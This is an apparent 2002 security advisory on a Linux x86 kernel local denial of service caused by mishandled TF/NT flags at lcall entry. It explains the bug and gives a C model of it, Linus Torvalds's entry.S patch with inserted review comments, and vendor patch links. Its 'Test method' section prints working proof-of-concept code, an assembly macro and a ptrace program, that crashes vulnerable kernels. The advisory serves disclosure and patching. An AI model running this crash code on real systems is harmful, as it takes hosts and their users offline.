Linux Kernel System Call TF/NT Flag Local Denial of Service Vulnerability

Date: 2002-12-02

Published: 2002-11-06
Updated: 2002-11-12

Affected systems:
Linux kernel 2.4.9
Linux kernel 2.4.8
Linux kernel 2.4.7
Linux kernel 2.4.6
Linux kernel 2.4.5
Linux kernel 2.4.4
Linux kernel 2.4.3
Linux kernel 2.4.2
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
Linux kernel 2.4.12
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.1
Linux kernel 2.2.21
Linux kernel 2.2.20
Linux kernel 2.2.19
Linux kernel 2.2.18
Linux kernel 2.2.17
Linux kernel 2.2.16
Linux kernel 2.2.15
Linux kernel 2.2.14
Linux kernel 2.2.13
Linux kernel 2.4.18
    - Debian Linux 3.0 i386
    - Debian Linux 3.0 sparc
    - Debian Linux 3.0 alpha
    - Debian Linux 3.0 IA-32
    - Debian Linux 3.0 arm
    - Debian Linux 3.0 powerpc
    - Debian Linux 3.0 68k
    - Mandrake Linux 8.2
    - Mandrake Linux 8.1
    - RedHat Linux 8.0
    - RedHat Linux 7.3
    - Slackware Linux 8.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 6115
CVE(CAN) ID: CAN-2002-1319

The Linux kernel is the open-source kernel of the Linux operating system.

The Linux kernel does not handle the TF/NT flags correctly on system call entry; a local attacker can exploit this to perform a denial of service attack.

When the Linux kernel services an lcall, it emulates a trap/interrupt gate. A real trap/interrupt gate clears the TF and NT flags in EFLAGS before entering the kernel, but the kernel's emulation code does not perform this step. If a local attacker deliberately sets TF or NT before issuing the lcall, the kernel proceeds with an incorrect EFLAGS value, which causes a kernel crash; the system may hang or reboot.

This vulnerability affects Linux kernel 2.2.x, 2.4.20 and earlier, and 2.5.x on the x86 platform.
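Added illustration (not part of the NSFOCUS advisory and not kernel code): a small user-space C model of what EFLAGS looks like on the three entry paths the description contrasts: a real trap gate, the unpatched lcall emulation, and the emulation after the fix shown in the vendor patch section below, which clears DF, TF and NT from the live flags only after the original value has been saved into the kernel's register frame. The entry_state structure and all function names are constructed for this illustration; the mask values are the standard x86 EFLAGS bit positions. The sample inputs are the flag values the advisory's own test fragments set (0x100, i.e. TF, and 0x4100, i.e. TF|NT), with IF added because a user process always runs with interrupts enabled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Standard x86 EFLAGS bit positions (same values as in the kernel patch). */
#define TF_MASK 0x00000100u   /* trap flag: single-step trap after every instruction */
#define IF_MASK 0x00000200u   /* interrupt enable */
#define DF_MASK 0x00000400u   /* direction flag */
#define NT_MASK 0x00004000u   /* nested task: makes iret perform a task switch */

/* Constructed model of the register state once the kernel starts executing. */
struct entry_state {
    uint32_t saved_eflags;  /* copy kept for the return to user space (pt_regs) */
    uint32_t live_eflags;   /* flags the CPU actually runs the kernel with */
};

/* A real trap gate: the CPU saves EFLAGS for iret and clears TF and NT
 * itself before the handler runs (an interrupt gate would also clear IF). */
struct entry_state enter_via_trap_gate(uint32_t user_eflags)
{
    struct entry_state s;
    s.saved_eflags = user_eflags;
    s.live_eflags  = user_eflags & ~(TF_MASK | NT_MASK);
    return s;
}

/* Unpatched lcall emulation: the flags are copied into the frame
 * (movl %eax,EFLAGS(%esp)) but nothing clears TF/NT in the live EFLAGS. */
struct entry_state enter_via_lcall_unpatched(uint32_t user_eflags)
{
    struct entry_state s;
    s.saved_eflags = user_eflags;
    s.live_eflags  = user_eflags;   /* the defect: user-controlled TF/NT survive */
    return s;
}

/* Patched lcall emulation: after the save, the fix does
 * andl $~(DF_MASK | TF_MASK | NT_MASK),%eax ; pushl %eax ; popfl */
struct entry_state enter_via_lcall_patched(uint32_t user_eflags)
{
    struct entry_state s;
    s.saved_eflags = user_eflags;   /* user's flags still restored on return */
    s.live_eflags  = user_eflags & ~(DF_MASK | TF_MASK | NT_MASK);
    return s;
}

/* Nonzero when the kernel would execute with a flag a gate should have cleared. */
int kernel_runs_with_unsafe_flags(struct entry_state s)
{
    return (s.live_eflags & (TF_MASK | NT_MASK)) != 0;
}

/* Writes the set flags of interest as e.g. "TF|NT" ("-" when none) into buf;
 * returns how many of them are set. buf must hold at least 2 bytes. */
int describe_gate_flags(uint32_t eflags, char *buf, size_t n)
{
    static const struct { uint32_t mask; const char *name; } bits[] = {
        { TF_MASK, "TF" }, { NT_MASK, "NT" }, { DF_MASK, "DF" }, { IF_MASK, "IF" },
    };
    int count = 0;
    buf[0] = '\0';
    for (size_t i = 0; i < sizeof bits / sizeof bits[0]; i++) {
        if (eflags & bits[i].mask) {
            if (count)
                strncat(buf, "|", n - strlen(buf) - 1);
            strncat(buf, bits[i].name, n - strlen(buf) - 1);
            count++;
        }
    }
    if (!count)
        strncpy(buf, "-", n);
    return count;
}

int main(void)
{
    /* Constructed inputs: 0x100 is what the advisory's popfl fragment loads,
     * 0x4100 is what its ptrace program ORs into the child's EFLAGS. */
    const uint32_t samples[] = { 0x100u | IF_MASK, 0x4100u | IF_MASK };
    char in[32], gate[32], bad[32], good[32];

    printf("%-8s %-10s %-14s %-14s %-12s\n",
           "eflags", "user set", "trap gate", "lcall (bug)", "lcall (fix)");
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        describe_gate_flags(samples[i], in, sizeof in);
        describe_gate_flags(enter_via_trap_gate(samples[i]).live_eflags, gate, sizeof gate);
        describe_gate_flags(enter_via_lcall_unpatched(samples[i]).live_eflags, bad, sizeof bad);
        describe_gate_flags(enter_via_lcall_patched(samples[i]).live_eflags, good, sizeof good);
        printf("0x%04x   %-10s %-14s %-14s %-12s\n", samples[i], in, gate, bad, good);
    }
    return 0;
}
```

The table printed by main shows the point of the patch: the live flags after the fixed lcall path match what a hardware trap gate would leave, while saved_eflags still carries the user's original value, so the process gets its own flags back on return. The fix also clears DF, which a real trap gate does not touch; that is a deliberate extra in the kernel patch, not part of the reported bug.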

<*Source: Georgi Guninski (guninski@guninski.com)
        Christophe Devine (devine@iie.cnam.fr)

  Links: http://www.guninski.com/php1.html
        http://marc.theaimsgroup.com/?l=bugtraq&m=103721681629765&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=103737292709297&w=2
        https://www.redhat.com/support/errata/RHSA-2002-264.html
        http://www.trustix.net/errata/misc/2002/TSL-2002-0077-kernel.asc.txt
        https://www.redhat.com/support/errata/RHSA-2002-262.html
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

The following assembly hangs kernels earlier than 2.4.19:

#define MSUX "mov $0x100,%eax\npushl %eax\nmov $0x1,%eax\npopfl\nlcall $7,$0"

Christophe Devine (devine@iie.cnam.fr) provided the following test program:

#include <sys/ptrace.h>
#include <sys/wait.h>     /* wait() */
#include <unistd.h>       /* fork(), usleep() */

/* i386 register block as returned by PTRACE_GETREGS; declared here
 * so that <sys/user.h> is not needed */
struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    /* machine code for "lcall $7,$0" (opcode 9A, offset 0, selector 7):
     * the call-gate system call entry described above */
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        /* child: give the parent time to attach, then enter the kernel
         * through the call gate */
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        /* parent: trace the child and, at every stop, rewrite its EFLAGS
         * before letting it continue to the next system call */
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF (0x100) and NT (0x4000) */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Do not allow untrusted users to log in to the system.

Vendor patches:

Linux
-----
Linus Torvalds has released a patch that fixes this security issue:

# The following is the BitKeeper ChangeSet Log
# --------------------------------------------
# 02/11/14      torvalds@home.transmeta.com       1.848
# Fix impressive call gate misuse DoS reported on bugtraq.
# --------------------------------------------
# 02/11/14      torvalds@home.transmeta.com       1.849
# Duh. Fix the other lcall entry point too.
# --------------------------------------------
#
diff -Nru a/arch/i386/kernel/entry.S b/arch/i386/kernel/entry.S
--- a/arch/i386/kernel/entry.S  Thu Nov 14 09:59:08 2002
+++ b/arch/i386/kernel/entry.S  Thu Nov 14 09:59:08 2002
@@ -66,7 +66,9 @@
OLDSS          = 0x38

CF_MASK                = 0x00000001
+TF_MASK                = 0x00000100
IF_MASK                = 0x00000200
+DF_MASK                = 0x00000400
NT_MASK                = 0x00004000
VM_MASK                = 0x00020000

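Review bot: the two new masks are correct for the EFLAGS layout (TF is bit 8, 0x100; DF is bit 10, 0x400) and keep the ascending order of the existing CF/IF/NT/VM definitions, but nothing in this hunk says why DF, which is not part of the reported bug, is introduced alongside TF; a one-line comment next to `DF_MASK = 0x00000400` pointing at the lcall entry paths that clear it would save the next reader a search.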
@@ -134,6 +136,17 @@
        movl %eax,EFLAGS(%esp)  #
        movl %edx,EIP(%esp)     # Now we move them to their "normal" places
        movl %ecx,CS(%esp)      #
+
+       #
+       # Call gates don't clear TF and NT in eflags like
+       # traps do, so we need to do it ourselves.
+       # %eax already contains eflags (but it may have
+       # DF set, clear that also)
+       #
+       andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+       pushl %eax
+       popfl
+
        movl %esp, %ebx
        pushl %ebx
        andl $-8192, %ebx       # GET_THREAD_INFO
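Review bot: the ordering in this hunk is load-bearing and deserves an explicit comment: `andl $~(DF_MASK | TF_MASK | NT_MASK),%eax` / `pushl %eax` / `popfl` run only after `movl %eax,EFLAGS(%esp)` has stored the original value, so the user's TF/NT/DF survive in the saved frame and are restored on return, while the flags the kernel actually executes under are cleared, which is what a hardware trap gate provides. The existing comment explains what is cleared but not that moving this block above the save would change user-visible behaviour.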
@@ -156,6 +169,17 @@
        movl %eax,EFLAGS(%esp)  #
        movl %edx,EIP(%esp)     # Now we move them to their "normal" places
        movl %ecx,CS(%esp)      #
+
+       #
+       # Call gates don't clear TF and NT in eflags like
+       # traps do, so we need to do it ourselves.
+       # %eax already contains eflags (but it may have
+       # DF set, clear that also)
+       #
+       andl $~(DF_MASK | TF_MASK | NT_MASK),%eax
+       pushl %eax
+       popfl
+
        movl %esp, %ebx
        pushl %ebx
        andl $-8192, %ebx       # GET_THREAD_INFO
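Review bot: this block is identical to the one added at the first lcall entry point, and the ChangeSet log above (1.849, "Fix the other lcall entry point too") shows the second site was initially missed; suggest defining an assembler macro, for example `.macro CLEAR_GATE_FLAGS` wrapping `andl $~(DF_MASK | TF_MASK | NT_MASK),%eax` / `pushl %eax` / `popfl`, and invoking it at both entry points so the two copies cannot drift apart.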

RedHat
------
RedHat has released security advisory RHSA-2002:264-05 and the corresponding patches:
RHSA-2002:264-05: New kernel 2.2 packages fix local denial of service issue
Link: https://www.redhat.com/support/errata/RHSA-2002-264.html

Patch download:

Red Hat Linux 6.2:

SRPMS:
ftp://updates.redhat.com/6.2/en/os/SRPMS/kernel-2.2.22-6.2.3.src.rpm

i386:
ftp://updates.redhat.com/6.2/en/os/i386/kernel-smp-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-BOOT-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-ibcs-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-utils-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-pcmcia-cs-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-doc-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-headers-2.2.22-6.2.3.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/kernel-source-2.2.22-6.2.3.i386.rpm

i586:
ftp://updates.redhat.com/6.2/en/os/i586/kernel-smp-2.2.22-6.2.3.i586.rpm
ftp://updates.redhat.com/6.2/en/os/i586/kernel-2.2.22-6.2.3.i586.rpm

i686:
ftp://updates.redhat.com/6.2/en/os/i686/kernel-enterprise-2.2.22-6.2.3.i686.rpm
ftp://updates.redhat.com/6.2/en/os/i686/kernel-smp-2.2.22-6.2.3.i686.rpm
ftp://updates.redhat.com/6.2/en/os/i686/kernel-2.2.22-6.2.3.i686.rpm

Red Hat Linux 7.0:

SRPMS:
ftp://updates.redhat.com/7.0/en/os/SRPMS/kernel-2.2.22-7.0.3.src.rpm

i386:
ftp://updates.redhat.com/7.0/en/os/i386/kernel-smp-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-BOOT-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-ibcs-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-utils-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-pcmcia-cs-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-doc-2.2.22-7.0.3.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/kernel-source-2.2.22-7.0.3.i386.rpm

i586:
ftp://updates.redhat.com/7.0/en/os/i586/kernel-smp-2.2.22-7.0.3.i586.rpm
ftp://updates.redhat.com/7.0/en/os/i586/kernel-2.2.22-7.0.3.i586.rpm

i686:
ftp://updates.redhat.com/7.0/en/os/i686/kernel-enterprise-2.2.22-7.0.3.i686.rpm
ftp://updates.redhat.com/7.0/en/os/i686/kernel-smp-2.2.22-7.0.3.i686.rpm
ftp://updates.redhat.com/7.0/en/os/i686/kernel-2.2.22-7.0.3.i686.rpm

RedHat has released security advisory RHSA-2002:262-07 and the corresponding patches:
RHSA-2002:262-07: New kernel fixes local denial of service issue
Link: https://www.redhat.com/support/errata/RHSA-2002-262.html

Patch download:
Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/kernel-2.4.18-18.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.3/en/os/athlon/kernel-2.4.18-18.7.x.athlon.rpm
ftp://updates.redhat.com/7.3/en/os/athlon/kernel-smp-2.4.18-18.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/kernel-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-source-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-doc-2.4.18-18.7.x.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/kernel-BOOT-2.4.18-18.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.3/en/os/i586/kernel-2.4.18-18.7.x.i586.rpm
ftp://updates.redhat.com/7.3/en/os/i586/kernel-smp-2.4.18-18.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.3/en/os/i686/kernel-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-smp-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-bigmem-2.4.18-18.7.x.i686.rpm
ftp://updates.redhat.com/7.3/en/os/i686/kernel-debug-2.4.18-18.7.x.i686.rpm

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-2.4.18-18.8.0.src.rpm

athlon:
ftp://updates.redhat.com/8.0/en/os/athlon/kernel-2.4.18-18.8.0.athlon.rpm
ftp://updates.redhat.com/8.0/en/os/athlon/kernel-smp-2.4.18-18.8.0.athlon.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/kernel-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-source-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-doc-2.4.18-18.8.0.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/kernel-BOOT-2.4.18-18.8.0.i386.rpm

i586:
ftp://updates.redhat.com/8.0/en/os/i586/kernel-2.4.18-18.8.0.i586.rpm
ftp://updates.redhat.com/8.0/en/os/i586/kernel-smp-2.4.18-18.8.0.i586.rpm

i686:
ftp://updates.redhat.com/8.0/en/os/i686/kernel-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-smp-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-bigmem-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-debug-2.4.18-18.8.0.i686.rpm
ftp://updates.redhat.com/8.0/en/os/i686/kernel-uml-2.4.18-18.8.0.i686.rpm

The patches can be installed with the following command:

rpm -Fvh [filename]

Trustix
-------
Trustix has released security advisory TSLSA-2002-0077 and the corresponding patches:
TSLSA-2002-0077: kernel
Link: http://www.trustix.net/errata/misc/2002/TSL-2002-0077-kernel.asc.txt

Patch download:

http://www.trustix.net/pub/Trustix/updates/

All rights reserved. Reproduction without permission is prohibited.